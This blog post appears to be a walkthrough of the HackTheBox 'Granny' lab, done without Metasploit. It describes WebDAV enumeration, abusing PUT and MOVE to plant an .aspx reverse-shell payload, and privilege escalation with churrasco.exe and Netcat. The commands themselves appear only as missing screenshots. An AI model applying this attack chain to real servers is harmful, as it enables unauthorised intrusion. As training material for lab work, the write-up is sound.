Post

HackTheBox_Granny | w/o Metasploit

Posted Updated
By Muqaram Majid
2 min read

HTB - Granny

Nmap Scan Results

Enumeration

Nmap Scan Results

To start the enumeration, I performed an Nmap scan to discover open ports and services running on the target machine.

Nmap Scan Results

Checking for Supported HTTP Methods

I then checked for supported HTTP methods.

HTTP Methods Check

What is WebDAV?

Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996.

ASP.NET Response Header

On checking the response header, we notice that it is being powered by ASP.NET.

ASP.NET Header

This tells us that we will be able to execute ASPX files on the server.

Directory Buster Results

I used Dirbuster to find directories and files on the server.

Dirbuster Results

Nothing useful was found.

Performing DAVTest

I performed a DAVTest to check what files can be uploaded.

DAVTest Results 1

DAVTest Results 2

Vulnerabilities

Reverse Shell Through HTTP Methods

I identified a workaround for a reverse shell through HTTP methods.

Exploitation

Using the MOVE Method

We can use the MOVE method, which allows us to rename files. Let’s try to upload a file, move it, and rename it to an .asp extension to see if that allows us to upload ASP files.

cURL, which stands for client URL, is a command-line tool that developers use to transfer data to and from a server. By default, cURL uses the GET method, but you can use -X to change it to other methods like POST, PUT, DELETE, etc.

cURL Command

Renaming the File

Perfect, now let’s try renaming it.

Renaming File 1

Renaming File 2

Creating a Reverse Shell Payload

I used msfvenom to create a reverse shell payload which I uploaded to the server as a text file and then renamed it to .asp.

Reverse Shell Payload Creation

Renaming to ASPX

Renaming the file to .aspx.

Renaming to ASPX

Testing the Payload

On curling, I encountered an error which was possibly because of incorrect formatting or formatting being lost.

Error on Curling

Preserving Formatting

To preserve formatting, I used a simple binary command.

Preserving Formatting

Accessing the Uploaded File

I visited the site to see if the formatting was preserved.

File Accessed

Great, the formatting is preserved.

Formatting Preserved

Privilege Escalation

Unfortunately, our privilege is still low. Let’s try escalating it by checking system info and searching for exploits.

System Info

Exploit Search 1

Exploit Search 2

Exploit Search 3

Writable Directory

Looking for a writable directory on the victim’s machine.

Writable Directory 1

Writable Directory 2

Uploading Files

I uploaded the churrasco.exe file and a Netcat listener.

Uploading Churrasco

Netcat Listener

now lets look for a writeable directory on the victims machine

Netcat Listener Setup

getting our churrasco.exe file

Netcat Listener Setup Netcat Listener Setup Netcat Listener Setup

Setting Up Another Listener

Setting up another Netcat listener.

Netcat Listener Setup

Running the Exploit

Running the Netcat listener using churrasco.

Running Exploit 1

Running Exploit 2

We have access now. Let’s grab our files.

User Flag

User Flag

Root Flag

Root Flag

Pwned

hackthebox, CTF, writeups
ctf hackthebox writeup windows easy
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.